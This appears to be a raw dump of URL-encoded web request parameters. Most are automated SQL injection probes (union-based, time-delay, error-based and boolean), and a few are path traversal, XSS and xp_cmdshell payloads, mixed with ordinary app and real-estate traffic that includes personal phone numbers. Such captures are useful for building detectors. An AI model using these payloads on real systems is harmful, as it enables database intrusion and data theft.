id=771&page=-1);select%20pg_sleep(9);%20--%20
op=count&id=-9993%29%20UNION%20ALL%20SELECT%20CONCAT%280x7170627171%2C0x66494c4c755169686950%2C0x71716a7671%29%2C61%2C61%2C61%23&modelid=1
c=member&a=createOrder&pid=104%27%29%20UNION%20ALL%20SELECT%2058%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2CCHR%28113%29%26CHR%28120%29%26CHR%28112%29%26CHR%28120%29%26CHR%28113%29%26CHR%2872%29%26CHR%28114%29%26CHR%28113%29%26CHR%28101%29%26CHR%28122%29%26CHR%2881%29%26CHR%2880%29%26CHR%28121%29%26CHR%2866%29%26CHR%28122%29%26CHR%28113%29%26CHR%28107%29%26CHR%28113%29%26CHR%2898%29%26CHR%28113%29%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%2C58%20FROM%20MSysAccessObjects%16
a_id=ff8080812d120be7012d120be7fe0000%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20SoQJ&sign=bm2012
r=ECWX6SOF%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27hhTY%27%3D%27hhTY&s=
r=Z8JPODCJ&s=%29%20AND%20%28SELECT%209976%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716b707871%2C%28SELECT%20%28ELT%289976%3D9976%2C1%29%29%29%2C0x716b6a6a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%281739%3D1739
r=O9RS5GFX%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&s=
r=WHQE8544%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20wVpC
r=A8DPW2K1&s=%25%27%20AND%209132%3D9132%20AND%20%27%25%27%3D%27
json=%7B%22city%22%3A%22%E6%83%A0%E5%B7%9E%22%2C%22content%22%3A%22%E8%B4%AD%E6%88%BF%E6%9D%A5%E7%94%B5%E4%BA%AB%E9%A2%9D%E5%A4%96%E6%83%8A%E5%96%9C%20%E6%9D%8E%E5%B0%8F%E5%A7%90%3A153-6014-9941%20%20%E5%A5%BD%E6%B6%88%E6%81%AF%EF%BC%8C%E5%A5%BD%E6%B6%88%E6%81%AF%EF%BC%8C%E5%A5%BD%E6%B6%88%E6%81%AF%EF%BC%8C%E5%86%85%E9%83%A8%E4%BC%98%E8%B4%A8%E6%88%BF%E6%BA%90%EF%BC%8C%E4%BB%B7%E6%A0%BC%E5%88%92%E7%AE%97%EF%BC%8C%E4%B8%93%E8%BD%A6%E6%8E%A5%E9%80%81%E7%9C%8B%E6%88%BF%E4%B8%8D%E6%94%B6%E5%8F%96%E4%BB%BB%E4%BD%95%E8%B4%B9%E7%94%A8%2C%E4%BA%AB%E6%9B%B4%E5%A4%9A%E6%8A%98%E6%89%A3..%20%22%2C%22passportId%22%3A%22108062787%22%2C%22passportName%22%3A%22wap3302837203%22%2C%22businessType%22%3A%221%22%2C%22newCode%22%3A%222818060154%22%2C%22projname%22%3A%22%E6%B5%B7%E4%BC%A6%E5%A0%A1%C2%B7%E7%88%B1ME%E5%9F%8E%E5%B8%82%22%2C%22source%22%3A%22fangapp%22%2C%22mediatype%22%3A%221%22%2C%22mideas%22%3A%5B%7B%22mediaType%22%3A%221%22%2C%22sort%22%3A%221%22%2C%22url%22%3A%22%3C%21DOCTYPEhtml%3E%0A%3Chtml%3
rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%201961440648%2c2%2c1173941274%2c4%2c5%2c6%2c7%2c8%2c9%2c0%2c1%2c2%2c3%20--
r=H42XTMX2%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&s=
r=4B7U7XP2%20AND%203650%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%283650%3D3650%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%29%29
fl=0+union+select+0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526--&chsh=&pp=
r=M0FZD0P0&s=%27%29%20ORDER%20BY%206513%23
ca_s=tg_ganji&ca_n=mayi_pd_fang1&gj_other_uuid=0x748550667b1f6b4ccf7b95b20c820a6&gj_other_ifid=from_ganji%27%29%20UNION%20ALL%20SELECT%2049%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2C49%2CCONCAT%280x71716a6b71%2C0x426d4c5369445679444d%2C0x7176716a71%29--%20OJak&gj_other_city_id=12&gj_other_sid=dfkl0ke5r6lsq6a85kkel5k086&gj_other_gc_1=all_cate&gj_other_ca_n=-&gj_other_ca_s=seo_baidu&gj_other_ca_i=-
fontstyle1=FONT-SIZE%3A%27%2C%29%29%2C.%28%28%22%29&viewid=3034&messagecontentcolor=F2FDFF&owner=1105210051&ownerName=jiaowu&messageid=1710&wbtreeid=1021&reimagelink=&dbName=vsb
r=6GG9GQAA%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
keepRecord=true%20AND%204900%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29
r=FHGD5DHC&s=%27%29%20AND%20SLEEP%285%29%20AND%20%28%27FQwo%27%3D%27FQwo
gid=17+union+select+0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526--
r=J6IS40P0&s=%20AND%205453%3DCAST%28%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285453%3D5453%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20wYpl
r=NKEAAPFR%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23
r=13IEXLGC%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27jjAp%27%3D%27jjAp&s=
r=HBJMWDC9%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&s=
nt=(select(0)from(select(sleep(3)))v)/*'%2b(select(0)from(select(sleep(3)))v)%2b'"%2b(select(0)from(select(sleep(3)))v)%2b"*/&q=s&wd=%E8%BD%A6
r=PTT1OIFC&s=%29%3BSELECT%20SLEEP%285%29%23
r=UGK8QK7C%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&s=
aliascn=%E5%B7%B4%E6%AC%A3&sort=%f6"onmouseover=L234(9157)//&sorttype=asc
r=OYFB2RT7%20OR%208770%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--&s=
r=LZXQM56A&s=%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
json=%7B%22city%22%3A%22%E6%83%A0%E5%B7%9E%22%2C%22content%22%3A%22%E5%A5%BD%E6%B6%88%E6%81%AF%21%E5%86%85%E9%83%A8%E4%BC%98%E8%B4%A8%E6%88%BF%E6%BA%90%20%E9%99%88%E5%B0%8F%E5%A7%90%3A188-2528-6361%20%20%E5%A5%BD%E6%B6%88%E6%81%AF%EF%BC%8C%E5%A5%BD%E6%B6%88%E6%81%AF%2C%E4%BB%B7%E6%A0%BC%E5%88%92%E7%AE%97%EF%BC%8C%E5%85%8D%E8%B4%B9%E6%8E%A5%E9%80%81%E7%9C%8B%E6%88%BF%E4%B8%8D%E6%94%B6%E5%8F%96%E4%BB%BB%E4%BD%95%E8%B4%B9%E7%94%A8%2C%E4%BA%AB%E6%9B%B4%E5%A4%9A%E6%8A%98%E6%89%A3..%22%2C%22passportId%22%3A%22102378472%22%2C%22passportName%22%3A%22ctwe2076%22%2C%22businessType%22%3A%221%22%2C%22newCode%22%3A%222817971478%22%2C%22projname%22%3A%22%E5%AF%8C%E5%8A%9B%E5%8D%97%E6%98%86%E5%B1%B1%E6%B8%A9%E6%B3%89%E5%85%BB%E7%94%9F%E8%B0%B7%22%2C%22source%22%3A%22fangapp%22%2C%22mediatype%22%3A%221%22%2C%22mideas%22%3A%5B%7B%22mediaType%22%3A%221%22%2C%22sort%22%3A%221%22%2C%22url%22%3A%22%3C%21DOCTYPEhtml%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Cmetacharset%3D%22utf-8%22%2F%3E%0A%3Cstyle%3E%0Abody%7Bbackgro
presentid=%28SELECT%20%28CASE%20WHEN%20%285800%3D2794%29%20THEN%205800%20ELSE%205800%2A%28SELECT%205800%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29&uname=czzhoudh&src=indexbottom
r=02CG5DRU%20ORDER%20BY%201%23&s=
act=sm_window&page=event&day=-1%20UNION%20SELECT%201%2c1539711690%2c505533845%20--
r=YNRC5PXA%27%29%20AND%205852%3D%28SELECT%205852%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27ALLu%27%3D%27ALLu&s=
r=KXYH53HU&s=%25%27%20AND%206030%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2884%29%7C%7CCHR%28121%29%7C%7CCHR%2883%29%2C5%29%20AND%20%27%25%27%3D%27
ID=69&page=0%25%27%20AND%20SLEEP%285%29%20AND%20%27%25%27%3D%27
r=BORM03E7%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23&s=
r=U69IL2DR%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20qVrL&s=
r=NZ3Y33D2%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20YLOD&s=
dh=Pg0xJvpL';select%20pg_sleep(6);%20--%20
presentid=3433118471%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&uname=songhuaiyu
json=%7B%22city%22%3A%22%E4%B8%9C%E8%8E%9E%22%2C%22content%22%3A%22%E5%A5%BD%E6%B6%88%E6%81%AF%21%E5%86%85%E9%83%A8%E4%BC%98%E8%B4%A8%E6%88%BF%E6%BA%90%20%E9%99%88%E5%B0%8F%E5%A7%90%3A188-2528-6361%20%20%E5%A5%BD%E6%B6%88%E6%81%AF%EF%BC%8C%E5%A5%BD%E6%B6%88%E6%81%AF%2C%E4%BB%B7%E6%A0%BC%E5%88%92%E7%AE%97%EF%BC%8C%E5%85%8D%E8%B4%B9%E6%8E%A5%E9%80%81%E7%9C%8B%E6%88%BF%E4%B8%8D%E6%94%B6%E5%8F%96%E4%BB%BB%E4%BD%95%E8%B4%B9%E7%94%A8%2C%E4%BA%AB%E6%9B%B4%E5%A4%9A%E6%8A%98%E6%89%A3..%20%20%22%2C%22passportId%22%3A%2270796080%22%2C%22passportName%22%3A%22gnewhous73659237%22%2C%22businessType%22%3A%221%22%2C%22newCode%22%3A%222819186164%22%2C%22projname%22%3A%22%E6%81%92%E5%A4%A7%E7%8F%BA%E5%BA%AD%22%2C%22source%22%3A%22fangapp%22%2C%22mediatype%22%3A%221%22%2C%22mideas%22%3A%5B%7B%22mediaType%22%3A%221%22%2C%22sort%22%3A%221%22%2C%22url%22%3A%22%3C%21DOCTYPEhtml%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Cmetacharset%3D%22utf-8%22%2F%3E%0A%3Cstyle%3E%0Abody%7Bbackground%3A%23fff%3Bfont-family%3Amicrosoftyah
fmdo=user&dopost=regnew'%20union%20select%200x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526%20--%20
appv=9.0&brand=L%2527OCCITANE%252F%25E6%25AC%25A7%25E8%2588%2592%25E4%25B8%25B9&cd0=ios&cd14=30&cd16=8695540350&cd19=w0gpQGR%252BXFI4%252BJ70pkrKlT6%252B1drVDwcwlpL4u5%252BYPTTmGQdwT%252FSIVA%253D%253D&cd49=d&cd53=%25E9%259D%25A2%25E9%2583%25A8%25E6%258A%25A4%25E7%2590%2586&cd54=%25E6%258A%25A4%25E8%2582%25A4%25E7%25B2%25BE%25E5%258D%258E&cd6=%25E4%25B8%25AA%25E6%258A%25A4%25E5%258C%2596%25E5%25A6%2586&cd67=%25E9%25A6%2596%25E9%25A1%25B5_%25E6%258E%25A8%25E8%258D%2590_feed%25E6%25B5%2581_d&cd7=%25E7%25B2%25BE%25E5%258D%258E%25E6%25B6%25B2&f=iphone&id=11049329&price=%25E6%2597%25A0&scname=iPhone%252F%25E5%25A5%25BD%25E4%25BB%25B7%252FP%252F11049329%252F&scname_last=iPhone%252F%25E9%25A6%2596%25E9%25A1%25B5%252F%25E6%258E%25A8%25E8%258D%2590%252F&sign=2F4187B52053A088801C6862DD96361B&time=1539728596&v=9.0&weixin=1
r=3C61KCSD%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20MbyW&s=
COLLCC=1107142277%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20vDzS&
r=PHGX1GOB&s=%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20HKPf
word=1&author=1&sd=1&ed=1&mode=titleandcontent&sort=d&amid=%25%27%29%20anD%2053%3D53%20%23
productId=&versionId=qx6U8aNV'));select%20pg_sleep(37.5);%20--%20&_method=forward
eid=34%20UNION%20SELECT%201370572218
op=Default&Date=200607'%20UNION%20SELECT%201%2c2100906330%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1
r=65WBA2S2%25%27%20AND%202096%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282096%3D2096%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27&s=
identity=ZjGJtLvq');select%20pg_sleep(8);%20--%20&password=g00dPa%24%24w0rD
fmdo=user%25%27%3BSELECT%20SLEEP%285%29%23&dopost=regnew
r=SPBXYX36&s=-1249%20ORDER%20BY%201--%20xLDd
r=0DLD6DCA%27%20AND%204666%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284666%3D4666%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%27JPCR%27%3D%27JPCR&s=
&authorid=1730517%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20GbRB
r=55J2M025&s=%28SELECT%20CONCAT%280x7178787071%2C%28SELECT%20%28ELT%281743%3D1743%2C1%29%29%29%2C0x7178787871%29%29
r=Z2O9M6R2%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&s=
navtypeid=6&page=6&priceFrom=&priceTo=&shopid=-1'%20OR%202%2b500-500-1=0%2b0%2b0%2b1%20or%20'SdqhOq4h'='&sort=sm_price&sorttype=asc&status=-1&typeid=-1
r=23GFODM0%27%29%20UNION%20ALL%20SELECT%20NULL--%20iCwt&s=
r=RZYN8R0Y%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20sVtk&s=
app=index%29%20AND%20MAKE_SET%287352%3D7352%2C6372%29&act=in_list&id=3
r=1E6NU3UC&s=%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20noJr
r=F3KGYAK3%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20KeZv&s=
cid=-1_-1_32777&navtypeid=5&priceFrom=&priceTo=&sort=1%2c(select%20case%20when%20(3%2b1-1-1=0%2b0%2b0%2b1)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)=1&sorttype=asc&status=5&typeid=-1
cid=-1_21745|32643|32644&navtypeid=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&priceFrom=&priceTo=&sort=m_introimage&sorttype=desc&status=6&typeid=-1
r=U5MB2X5C&s=%27%20ORDER%20BY%201%23
r=3BYWXP9U&s=%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20Rvhh
r=6UFWURBP&s=%29%20UNION%20ALL%20SELECT%2058%2C58%2C58%2C58%2C58%2C58%2CCONCAT%280x7162707a71%2C0x67535942784c4b7979725174446742625369674868755a6279786d6f45655945474e6c6b4d534b4c%2C0x717a627171%29%23
appv=8.9&brand=L%2527OCCITANE%252F%25E6%25AC%25A7%25E8%2588%2592%25E4%25B8%25B9&cd0=ios&cd14=30&cd16=8635972550&cd19=bll%252FC198pS95YbOEU4DaYwZR1sBn%252Fn%252FKrRrc%252BA42d1Glpg5v76Ph9Q%253D%253D&cd49=c&cd53=%25E7%25BE%258E%25E5%258F%2591%25E6%258A%25A4%25E5%258F%2591&cd54=%25E6%25B4%2597%25E5%258F%2591%25E6%258A%25A4%25E5%258F%2591&cd6=%25E4%25B8%25AA%25E6%258A%25A4%25E5%258C%2596%25E5%25A6%2586&cd67=%25E5%25A5%25BD%25E4%25BB%25B7_feed%25E6%25B5%2581&cd7=%25E6%2597%25A0&f=iphone&id=11063841&price=%25E6%2597%25A0&scname=iPhone%252F%25E5%25A5%25BD%25E4%25BB%25B7%252F%25E5%258F%2591%25E7%258E%25B0%252F11063841%252F&scname_last=iPhone%252F%25E5%25A5%25BD%25E4%25BB%25B7%252F%25E7%25B2%25BE%25E9%2580%2589%252F&sign=E16F03C85636112FC8CC787542748990&time=1539738650&v=8.9&weixin=1
r=QHIW18MD&s=%20ORDER%20BY%201%23
keyword='%20and%201%3d2%20and%20'a'%3d'a
x=browse&category='UNION%20SELECT%20'1'%2c'2'%2c'pixelpost_category_sql_injection.nasl'%2c'1539737029'%2c'5'--
json=%7B%22city%22%3A%22%E6%B7%B1%E5%9C%B3%22%2C%22content%22%3A%22%E5%A5%BD%E6%B6%88%E6%81%AF%21%E5%86%85%E9%83%A8%E4%BC%98%E8%B4%A8%E6%88%BF%E6%BA%90%20%E9%99%88%E5%B0%8F%E5%A7%90%3A188-2528-6361%20%20%E5%A5%BD%E6%B6%88%E6%81%AF%EF%BC%8C%E5%A5%BD%E6%B6%88%E6%81%AF%2C%E4%BB%B7%E6%A0%BC%E5%88%92%E7%AE%97%EF%BC%8C%E5%85%8D%E8%B4%B9%E6%8E%A5%E9%80%81%E7%9C%8B%E6%88%BF%E4%B8%8D%E6%94%B6%E5%8F%96%E4%BB%BB%E4%BD%95%E8%B4%B9%E7%94%A8%2C%E4%BA%AB%E6%9B%B4%E5%A4%9A%E6%8A%98%E6%89%A3..%20%22%2C%22passportId%22%3A%2270803188%22%2C%22passportName%22%3A%22sumhuno1%22%2C%22businessType%22%3A%221%22%2C%22newCode%22%3A%222811235286%22%2C%22projname%22%3A%22%E6%81%92%E5%9C%B0%E6%82%A6%E5%B1%B1%E6%B9%96%22%2C%22source%22%3A%22fangapp%22%2C%22mediatype%22%3A%221%22%2C%22mideas%22%3A%5B%7B%22mediaType%22%3A%221%22%2C%22sort%22%3A%221%22%2C%22url%22%3A%22%3C%21DOCTYPEhtml%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Cmetacharset%3D%22utf-8%22%2F%3E%0A%3Cstyle%3E%0Abody%7Bbackground%3A%23fff%3Bfont-family%3Amicrosoftyahei
r=BXZ8G8E0&s=%20AND%203921%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283921%3D3921%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29
r=3BIH6Y1M&s=%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23
r=6XR8DHLO&s=%20ORDER%20BY%201959%23
act=register%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23
r=B9Y92RJ0&s=%29%20AND%20%28SELECT%203397%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7170766a71%2C%28SELECT%20%28ELT%283397%3D3397%2C1%29%29%29%2C0x7176627871%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287913%3D7913
method=writes-start&zj=0'+union+select+0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526,0x5e2526+--+&formid=2014111418816602221&xjlb=0&type=1
id='/**/UNION/**/SELECT/**/1,2,1539710343,4--&blog=1
r=L6FKWX8U&s=%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
op=Default&Date=200607'%20UNION%20SELECT%201%2c589293400%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1
gourl=aHR0cDovL3RnLmhleHVuLmNvbQ==&fromhost=&KvnP%3D6188%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23
id_article=1&id_forum=-1/**/UNION/**/SELECT%20726753859--
r=Z80JIDXO%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%289047%3D9047&s=
fontstyle1=FONT-SIZE%3A&viewid=3034&messagecontentcolor=F2FDFF%25%27%20AND%20%28SELECT%201846%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176706b71%2C%28SELECT%20%28ELT%281846%3D1846%2C1%29%29%29%2C0x716a6a7a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27&owner=1105210051&ownerName=jiaowu&messageid=1710&wbtreeid=1021&reimagelink=&dbName=vsb
startrecord=1&endrecord=37%29+having+1%3D1--&perpage=15
r=P5QCDCR2%29%20AND%206105%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286105%3D6105%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28118%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%282026%3D2026&s=
r=ELTHU4UC%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20XQKO&s=
page=2&sid=26')%20WAITFOR%20DELAY%20'0:0:5'--
r=A85CGAB6%27%20ORDER%20BY%208658%23&s=
appv=8.8&brand=pura%2520d%2527or&cd0=ios&cd14=29&cd16=5881265838&cd19=HNt4NLCo1y9uWfanjrv6O3pZ7ZY6QFwp3HSyaWQu21jYzTYyrpcLOw%253D%253D&cd49=a&cd53=%25E7%25BE%258E%25E5%258F%2591%25E6%258A%25A4%25E5%258F%2591&cd54=%25E6%25B4%2597%25E5%258F%2591%25E6%258A%25A4%25E5%258F%2591&cd6=%25E4%25B8%25AA%25E6%258A%25A4%25E5%258C%2596%25E5%25A6%2586&cd67=%25E6%2590%259C%25E7%25B4%25A2&cd7=%25E6%258A%25A4%25E5%258F%2591%25E4%25BA%25A7%25E5%2593%2581&f=iphone&id=10581313&price=%25E6%2597%25A0&scname=iPhone%252F%25E5%25A5%25BD%25E4%25BB%25B7%252F%25E5%258F%2591%25E7%258E%25B0%252F10581313%252F&scname_last=iPhone%252F%25E5%25A5%25BD%25E4%25BB%25B7%252F%25E6%25B5%25B7%25E6%25B7%2598%252F&sign=C4ED019C5E818CDA34DD16E8FC887A10&time=1539786721&v=8.8&weixin=1
view=yes&aid=188'%20UNION%20ALL%20SELECT%20NULL,NULL
r=5GMUZDA3%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20QNkP&s=
r=MSYMNI4R%27%29%20AND%209346%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2873%29%7C%7CCHR%2887%29%7C%7CCHR%28108%29%7C%7CCHR%2882%29%2C5%29%20AND%20%28%27PfLo%27%3D%27PfLo&s=
presentid=3433118471%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&uname=afslqq&src=indexbottom
